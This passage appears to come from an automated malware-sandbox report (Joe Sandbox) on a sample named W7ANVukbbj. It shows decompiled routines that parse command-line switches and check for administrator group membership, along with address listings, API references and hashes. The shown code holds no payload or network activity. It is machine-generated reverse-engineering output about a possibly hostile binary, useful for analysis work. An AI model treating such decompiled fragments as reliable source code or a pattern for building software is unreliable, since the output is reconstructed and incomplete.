                                                                                                                                                                                                          																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                          																			goto L49;
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		_t201 = _v265;
                                                                                                                                                                                                          																		 *0x869a2c = 1;
                                                                                                                                                                                                          																		if(_t201 != 0) {
                                                                                                                                                                                                          																			_t220 =  &_v265;
                                                                                                                                                                                                          																			do {
                                                                                                                                                                                                          																				_t220 = _t220 + 1;
                                                                                                                                                                                                          																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                          																				if(_t142 == 0) {
                                                                                                                                                                                                          																					_t143 = 2;
                                                                                                                                                                                                          																					 *0x869a2c =  *0x869a2c | _t143;
                                                                                                                                                                                                          																					goto L70;
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t145 = _t142 - 3;
                                                                                                                                                                                                          																					if(_t145 == 0) {
                                                                                                                                                                                                          																						 *0x868d48 =  *0x868d48 | 0x00000040;
                                                                                                                                                                                                          																					} else {
                                                                                                                                                                                                          																						_t146 = _t145 - 5;
                                                                                                                                                                                                          																						if(_t146 == 0) {
                                                                                                                                                                                                          																							 *0x869a2c =  *0x869a2c & 0xfffffffd;
                                                                                                                                                                                                          																							goto L70;
                                                                                                                                                                                                          																						} else {
                                                                                                                                                                                                          																							_t147 = _t146 - 5;
                                                                                                                                                                                                          																							if(_t147 == 0) {
                                                                                                                                                                                                          																								 *0x869a2c =  *0x869a2c & 0xfffffffe;
                                                                                                                                                                                                          																								goto L70;
                                                                                                                                                                                                          																							} else {
                                                                                                                                                                                                          																								_t149 = _t147;
                                                                                                                                                                                                          																								if(_t149 == 0) {
                                                                                                                                                                                                          																									 *0x868d48 =  *0x868d48 | 0x00000080;
                                                                                                                                                                                                          																								} else {
                                                                                                                                                                                                          																									if(_t149 == 3) {
                                                                                                                                                                                                          																										 *0x869a2c =  *0x869a2c | 0x00000004;
                                                                                                                                                                                                          																										L70:
                                                                                                                                                                                                          																										 *0x868a28 = 1;
                                                                                                                                                                                                          																									} else {
                                                                                                                                                                                                          																										_t209 = 0;
                                                                                                                                                                                                          																									}
                                                                                                                                                                                                          																								}
                                                                                                                                                                                                          																							}
                                                                                                                                                                                                          																						}
                                                                                                                                                                                                          																					}
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																				_t144 =  *_t220;
                                                                                                                                                                                                          																				_t201 = _t144;
                                                                                                                                                                                                          																			} while (_t144 != 0);
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	 *0x869a2c = 3;
                                                                                                                                                                                                          																	 *0x868a28 = 1;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          																goto L50;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																if(_t132 == 0) {
                                                                                                                                                                                                          																	goto L98;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	L49:
                                                                                                                                                                                                          																	_t209 = 0;
                                                                                                                                                                                                          																	L50:
                                                                                                                                                                                                          																	_t173 = _v272;
                                                                                                                                                                                                          																	if( *_t173 != 0) {
                                                                                                                                                                                                          																		goto L2;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		break;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L106;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										L34:
                                                                                                                                                                                                          										_t209 = 0;
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L131;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *0x868a2c != 0 &&  *0x868b3e == 0) {
                                                                                                                                                                                                          						if(GetModuleFileNameA( *0x869a3c, 0x868b3e, 0x104) == 0) {
                                                                                                                                                                                                          							_t209 = 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t202 = 0x5c;
                                                                                                                                                                                                          							 *((char*)(E008666C8(0x868b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t63 = _t209;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L131:
                                                                                                                                                                                                          			}


































































                                                                                                                                                                                                          0x00865c9e
                                                                                                                                                                                                          0x00865ca9
                                                                                                                                                                                                          0x00865cb0
                                                                                                                                                                                                          0x00865cb3
                                                                                                                                                                                                          0x00865cb6
                                                                                                                                                                                                          0x00865cb7
                                                                                                                                                                                                          0x00865cb8
                                                                                                                                                                                                          0x00865cbd
                                                                                                                                                                                                          0x00866204
                                                                                                                                                                                                          0x00865ccb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865ccb
                                                                                                                                                                                                          0x00865cd3
                                                                                                                                                                                                          0x00865cd7
                                                                                                                                                                                                          0x00865cf4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865cf4
                                                                                                                                                                                                          0x00865cf8
                                                                                                                                                                                                          0x00865d00
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d06
                                                                                                                                                                                                          0x00865d06
                                                                                                                                                                                                          0x00865d0e
                                                                                                                                                                                                          0x00865d10
                                                                                                                                                                                                          0x00865d12
                                                                                                                                                                                                          0x00865d14
                                                                                                                                                                                                          0x00865d15
                                                                                                                                                                                                          0x00865d17
                                                                                                                                                                                                          0x00865d49
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d19
                                                                                                                                                                                                          0x00865d19
                                                                                                                                                                                                          0x00865d1d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d3f
                                                                                                                                                                                                          0x00865d3f
                                                                                                                                                                                                          0x00865d4b
                                                                                                                                                                                                          0x00865d4b
                                                                                                                                                                                                          0x00865d4f
                                                                                                                                                                                                          0x00865d8d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d93
                                                                                                                                                                                                          0x00865d93
                                                                                                                                                                                                          0x00865d9a
                                                                                                                                                                                                          0x00865d9d
                                                                                                                                                                                                          0x00865d9e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d9e
                                                                                                                                                                                                          0x00865d51
                                                                                                                                                                                                          0x00865d5b
                                                                                                                                                                                                          0x00865d72
                                                                                                                                                                                                          0x008660fb
                                                                                                                                                                                                          0x008660fb
                                                                                                                                                                                                          0x00866207
                                                                                                                                                                                                          0x0086620a
                                                                                                                                                                                                          0x0086620b
                                                                                                                                                                                                          0x0086620e
                                                                                                                                                                                                          0x00866217
                                                                                                                                                                                                          0x00865d78
                                                                                                                                                                                                          0x00865d78
                                                                                                                                                                                                          0x00865d80
                                                                                                                                                                                                          0x00865d83
                                                                                                                                                                                                          0x00865d84
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d84
                                                                                                                                                                                                          0x00865d5d
                                                                                                                                                                                                          0x00865d5f
                                                                                                                                                                                                          0x00865d62
                                                                                                                                                                                                          0x00865d68
                                                                                                                                                                                                          0x00865d64
                                                                                                                                                                                                          0x00865d64
                                                                                                                                                                                                          0x00865d64
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d62
                                                                                                                                                                                                          0x00865d5b
                                                                                                                                                                                                          0x00865d4f
                                                                                                                                                                                                          0x00865d1d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d9f
                                                                                                                                                                                                          0x00865d9f
                                                                                                                                                                                                          0x00865da5
                                                                                                                                                                                                          0x00865dab
                                                                                                                                                                                                          0x00865dba
                                                                                                                                                                                                          0x00866218
                                                                                                                                                                                                          0x0086621d
                                                                                                                                                                                                          0x00866220
                                                                                                                                                                                                          0x00866221
                                                                                                                                                                                                          0x00866229
                                                                                                                                                                                                          0x00866230
                                                                                                                                                                                                          0x00866247
                                                                                                                                                                                                          0x0086626a
                                                                                                                                                                                                          0x00866272
                                                                                                                                                                                                          0x00866249
                                                                                                                                                                                                          0x00866255
                                                                                                                                                                                                          0x0086625f
                                                                                                                                                                                                          0x00866264
                                                                                                                                                                                                          0x00866264
                                                                                                                                                                                                          0x00866284
                                                                                                                                                                                                          0x00865dc0
                                                                                                                                                                                                          0x00865dc0
                                                                                                                                                                                                          0x00865dca
                                                                                                                                                                                                          0x00865e22
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865dcc
                                                                                                                                                                                                          0x00865dce
                                                                                                                                                                                                          0x00865e24
                                                                                                                                                                                                          0x00865e24
                                                                                                                                                                                                          0x00865e2c
                                                                                                                                                                                                          0x00865e47
                                                                                                                                                                                                          0x00865e4a
                                                                                                                                                                                                          0x008661d2
                                                                                                                                                                                                          0x008661e2
                                                                                                                                                                                                          0x008661e7
                                                                                                                                                                                                          0x008661ee
                                                                                                                                                                                                          0x008661f1
                                                                                                                                                                                                          0x008661f1
                                                                                                                                                                                                          0x008661f8
                                                                                                                                                                                                          0x008661f8
                                                                                                                                                                                                          0x00865e50
                                                                                                                                                                                                          0x00865e53
                                                                                                                                                                                                          0x00866109
                                                                                                                                                                                                          0x0086611f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866125
                                                                                                                                                                                                          0x00866137
                                                                                                                                                                                                          0x0086613a
                                                                                                                                                                                                          0x0086613c
                                                                                                                                                                                                          0x0086613e
                                                                                                                                                                                                          0x0086613e
                                                                                                                                                                                                          0x00866141
                                                                                                                                                                                                          0x00866141
                                                                                                                                                                                                          0x00866143
                                                                                                                                                                                                          0x00866144
                                                                                                                                                                                                          0x0086614a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866150
                                                                                                                                                                                                          0x00866152
                                                                                                                                                                                                          0x0086615c
                                                                                                                                                                                                          0x00866170
                                                                                                                                                                                                          0x00866172
                                                                                                                                                                                                          0x0086617c
                                                                                                                                                                                                          0x00866190
                                                                                                                                                                                                          0x00866190
                                                                                                                                                                                                          0x00866196
                                                                                                                                                                                                          0x008661a5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008661ab
                                                                                                                                                                                                          0x008661b9
                                                                                                                                                                                                          0x008661c6
                                                                                                                                                                                                          0x008661c6
                                                                                                                                                                                                          0x0086617e
                                                                                                                                                                                                          0x00866180
                                                                                                                                                                                                          0x0086618a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086618a
                                                                                                                                                                                                          0x0086615e
                                                                                                                                                                                                          0x00866160
                                                                                                                                                                                                          0x0086616a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086616a
                                                                                                                                                                                                          0x0086615c
                                                                                                                                                                                                          0x0086614a
                                                                                                                                                                                                          0x0086610b
                                                                                                                                                                                                          0x0086610e
                                                                                                                                                                                                          0x0086610e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e59
                                                                                                                                                                                                          0x00865e59
                                                                                                                                                                                                          0x00865e5c
                                                                                                                                                                                                          0x0086604f
                                                                                                                                                                                                          0x00866056
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086605c
                                                                                                                                                                                                          0x0086606e
                                                                                                                                                                                                          0x00866071
                                                                                                                                                                                                          0x00866073
                                                                                                                                                                                                          0x00866075
                                                                                                                                                                                                          0x00866075
                                                                                                                                                                                                          0x00866078
                                                                                                                                                                                                          0x00866078
                                                                                                                                                                                                          0x0086607a
                                                                                                                                                                                                          0x0086607b
                                                                                                                                                                                                          0x00866081
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866087
                                                                                                                                                                                                          0x00866087
                                                                                                                                                                                                          0x0086608d
                                                                                                                                                                                                          0x0086609c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008660a2
                                                                                                                                                                                                          0x008660aa
                                                                                                                                                                                                          0x008660b2
                                                                                                                                                                                                          0x008660b7
                                                                                                                                                                                                          0x008660bd
                                                                                                                                                                                                          0x008660bf
                                                                                                                                                                                                          0x008660bf
                                                                                                                                                                                                          0x008660d6
                                                                                                                                                                                                          0x008660e0
                                                                                                                                                                                                          0x008660e7
                                                                                                                                                                                                          0x008660f5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008660f5
                                                                                                                                                                                                          0x0086609c
                                                                                                                                                                                                          0x00866081
                                                                                                                                                                                                          0x00865e62
                                                                                                                                                                                                          0x00865e62
                                                                                                                                                                                                          0x00865e65
                                                                                                                                                                                                          0x00865fd3
                                                                                                                                                                                                          0x00865fe9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865fef
                                                                                                                                                                                                          0x00865fef
                                                                                                                                                                                                          0x00865ff7
                                                                                                                                                                                                          0x00865ffd
                                                                                                                                                                                                          0x00866003
                                                                                                                                                                                                          0x00866006
                                                                                                                                                                                                          0x00866011
                                                                                                                                                                                                          0x00866014
                                                                                                                                                                                                          0x0086603d
                                                                                                                                                                                                          0x00866016
                                                                                                                                                                                                          0x00866018
                                                                                                                                                                                                          0x00866019
                                                                                                                                                                                                          0x0086601b
                                                                                                                                                                                                          0x00866033
                                                                                                                                                                                                          0x0086601d
                                                                                                                                                                                                          0x00866020
                                                                                                                                                                                                          0x00866029
                                                                                                                                                                                                          0x00866022
                                                                                                                                                                                                          0x00866022
                                                                                                                                                                                                          0x00866022
                                                                                                                                                                                                          0x00866020
                                                                                                                                                                                                          0x0086601b
                                                                                                                                                                                                          0x00866042
                                                                                                                                                                                                          0x00866044
                                                                                                                                                                                                          0x00866046
                                                                                                                                                                                                          0x0086604a
                                                                                                                                                                                                          0x00865ff7
                                                                                                                                                                                                          0x00865fd5
                                                                                                                                                                                                          0x00865fd8
                                                                                                                                                                                                          0x00865fd8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e6b
                                                                                                                                                                                                          0x00865e6b
                                                                                                                                                                                                          0x00865e6e
                                                                                                                                                                                                          0x00865f8b
                                                                                                                                                                                                          0x00865f99
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865f9f
                                                                                                                                                                                                          0x00865fa7
                                                                                                                                                                                                          0x00865faf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865fb1
                                                                                                                                                                                                          0x00865fb3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865fb5
                                                                                                                                                                                                          0x00865fb7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865fb9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865fb9
                                                                                                                                                                                                          0x00865fb7
                                                                                                                                                                                                          0x00865fb3
                                                                                                                                                                                                          0x00865faf
                                                                                                                                                                                                          0x00865f8d
                                                                                                                                                                                                          0x00865f8d
                                                                                                                                                                                                          0x00865f8d
                                                                                                                                                                                                          0x00865f8f
                                                                                                                                                                                                          0x00865fc1
                                                                                                                                                                                                          0x00865fc1
                                                                                                                                                                                                          0x00865fc1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e74
                                                                                                                                                                                                          0x00865e74
                                                                                                                                                                                                          0x00865e77
                                                                                                                                                                                                          0x00865ea0
                                                                                                                                                                                                          0x00865ebd
                                                                                                                                                                                                          0x00865f79
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865f7f
                                                                                                                                                                                                          0x00865ec3
                                                                                                                                                                                                          0x00865ec3
                                                                                                                                                                                                          0x00865ecc
                                                                                                                                                                                                          0x00865ed4
                                                                                                                                                                                                          0x00865ed6
                                                                                                                                                                                                          0x00865edc
                                                                                                                                                                                                          0x00865edf
                                                                                                                                                                                                          0x00865eea
                                                                                                                                                                                                          0x00865eed
                                                                                                                                                                                                          0x00865f3f
                                                                                                                                                                                                          0x00865f40
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865eef
                                                                                                                                                                                                          0x00865eef
                                                                                                                                                                                                          0x00865ef2
                                                                                                                                                                                                          0x00865f34
                                                                                                                                                                                                          0x00865ef4
                                                                                                                                                                                                          0x00865ef4
                                                                                                                                                                                                          0x00865ef7
                                                                                                                                                                                                          0x00865f2b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865ef9
                                                                                                                                                                                                          0x00865ef9
                                                                                                                                                                                                          0x00865efc
                                                                                                                                                                                                          0x00865f22
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865efe
                                                                                                                                                                                                          0x00865eff
                                                                                                                                                                                                          0x00865f02
                                                                                                                                                                                                          0x00865f16
                                                                                                                                                                                                          0x00865f04
                                                                                                                                                                                                          0x00865f07
                                                                                                                                                                                                          0x00865f0d
                                                                                                                                                                                                          0x00865f46
                                                                                                                                                                                                          0x00865f46
                                                                                                                                                                                                          0x00865f09
                                                                                                                                                                                                          0x00865f09
                                                                                                                                                                                                          0x00865f09
                                                                                                                                                                                                          0x00865f07
                                                                                                                                                                                                          0x00865f02
                                                                                                                                                                                                          0x00865efc
                                                                                                                                                                                                          0x00865ef7
                                                                                                                                                                                                          0x00865ef2
                                                                                                                                                                                                          0x00865f4c
                                                                                                                                                                                                          0x00865f4e
                                                                                                                                                                                                          0x00865f50
                                                                                                                                                                                                          0x00865f54
                                                                                                                                                                                                          0x00865ed4
                                                                                                                                                                                                          0x00865ea2
                                                                                                                                                                                                          0x00865ea4
                                                                                                                                                                                                          0x00865eaf
                                                                                                                                                                                                          0x00865eaf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e79
                                                                                                                                                                                                          0x00865e7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e83
                                                                                                                                                                                                          0x00865e83
                                                                                                                                                                                                          0x00865e83
                                                                                                                                                                                                          0x00865e85
                                                                                                                                                                                                          0x00865e85
                                                                                                                                                                                                          0x00865e8e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e94
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e94
                                                                                                                                                                                                          0x00865e8e
                                                                                                                                                                                                          0x00865e7d
                                                                                                                                                                                                          0x00865e77
                                                                                                                                                                                                          0x00865e6e
                                                                                                                                                                                                          0x00865e65
                                                                                                                                                                                                          0x00865e5c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00865dce
                                                                                                                                                                                                          0x00865dca
                                                                                                                                                                                                          0x00865dba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d00
                                                                                                                                                                                                          0x00865dd9
                                                                                                                                                                                                          0x00865e04
                                                                                                                                                                                                          0x008661fe
                                                                                                                                                                                                          0x00865e0a
                                                                                                                                                                                                          0x00865e0c
                                                                                                                                                                                                          0x00865e17
                                                                                                                                                                                                          0x00865e17
                                                                                                                                                                                                          0x00865e04
                                                                                                                                                                                                          0x00866200
                                                                                                                                                                                                          0x00866200
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharNextA.USER32(?,00000000,?,?), ref: 00865CEE
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00868B3E,00000104,00000000,?,?), ref: 00865DFC
                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 00865E3E
                                                                                                                                                                                                          • CharUpperA.USER32(-00000052), ref: 00865EE1
                                                                                                                                                                                                          • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00865F6F
                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 00865FA7
                                                                                                                                                                                                          • CharUpperA.USER32(-0000004E), ref: 00866008
                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 008660AA
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00861140,00000000,00000040,00000000), ref: 008661F1
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 008661F8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                          • String ID: "$"$:$RegServer
                                                                                                                                                                                                          • API String ID: 1203814774-25366791
                                                                                                                                                                                                          • Opcode ID: 81de80c48ad8d6d20fbee3dbab4a165165bddd85ea8ca490b315afd5fe15f6fb
                                                                                                                                                                                                          • Instruction ID: 5d6a32c183a021fec4a4eb05e4456edda3d03416e863d77b82628c1f1b8623a8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81de80c48ad8d6d20fbee3dbab4a165165bddd85ea8ca490b315afd5fe15f6fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D15F71A04A989FDF358B3C9C487B93BA5FB16304F1701BAD4C6D6191EBB18E868F41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                          			E008618A3(void* __edx, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                          				long _t45;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                                                          				_t49 = __edx;
                                                                                                                                                                                                          				_t23 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                          				_t25 =  *0x868128; // 0x2
                                                                                                                                                                                                          				_t45 = 0;
                                                                                                                                                                                                          				_v12 = 0x500;
                                                                                                                                                                                                          				_t50 = 2;
                                                                                                                                                                                                          				_v16.Value = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				if(_t25 != _t50) {
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					return E00866CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(E008617EE( &_v20) != 0) {
                                                                                                                                                                                                          					_t25 = _v20;
                                                                                                                                                                                                          					if(_v20 != 0) {
                                                                                                                                                                                                          						 *0x868128 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                          					CloseHandle(_v28);
                                                                                                                                                                                                          					_t25 = _v20;
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                          					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                          					if(_t52 == 0) {
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						_pop(_t51);
                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                          						LocalFree(_t52);
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if( *_t52 <= 0) {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							FreeSid(_v32);
                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                          						_t50 = _t15;
                                                                                                                                                                                                          						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                          							_t45 = _t45 + 1;
                                                                                                                                                                                                          							_t50 = _t50 + 8;
                                                                                                                                                                                                          							if(_t45 <  *_t52) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x868128 = 1;
                                                                                                                                                                                                          						_v20 = 1;
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          0x008618a3
                                                                                                                                                                                                          0x008618a3
                                                                                                                                                                                                          0x008618ab
                                                                                                                                                                                                          0x008618b2
                                                                                                                                                                                                          0x008618b5
                                                                                                                                                                                                          0x008618be
                                                                                                                                                                                                          0x008618c0
                                                                                                                                                                                                          0x008618c6
                                                                                                                                                                                                          0x008618c7
                                                                                                                                                                                                          0x008618ca
                                                                                                                                                                                                          0x008618cf
                                                                                                                                                                                                          0x008619c9
                                                                                                                                                                                                          0x008619d8
                                                                                                                                                                                                          0x008619d8
                                                                                                                                                                                                          0x008618df
                                                                                                                                                                                                          0x008619b8
                                                                                                                                                                                                          0x008619bd
                                                                                                                                                                                                          0x008619bf
                                                                                                                                                                                                          0x008619bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008619bd
                                                                                                                                                                                                          0x008618fa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861912
                                                                                                                                                                                                          0x008619aa
                                                                                                                                                                                                          0x008619ad
                                                                                                                                                                                                          0x008619b3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861927
                                                                                                                                                                                                          0x00861927
                                                                                                                                                                                                          0x00861932
                                                                                                                                                                                                          0x00861936
                                                                                                                                                                                                          0x008619a9
                                                                                                                                                                                                          0x008619a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008619a9
                                                                                                                                                                                                          0x0086194c
                                                                                                                                                                                                          0x008619a2
                                                                                                                                                                                                          0x008619a3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086196e
                                                                                                                                                                                                          0x00861970
                                                                                                                                                                                                          0x00861999
                                                                                                                                                                                                          0x0086199c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086199c
                                                                                                                                                                                                          0x00861972
                                                                                                                                                                                                          0x00861972
                                                                                                                                                                                                          0x00861975
                                                                                                                                                                                                          0x00861984
                                                                                                                                                                                                          0x00861985
                                                                                                                                                                                                          0x0086198a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086198c
                                                                                                                                                                                                          0x00861991
                                                                                                                                                                                                          0x00861996
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861996
                                                                                                                                                                                                          0x0086194c

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 008617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008618DD), ref: 0086181A
                                                                                                                                                                                                            • Part of subcall function 008617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0086182C
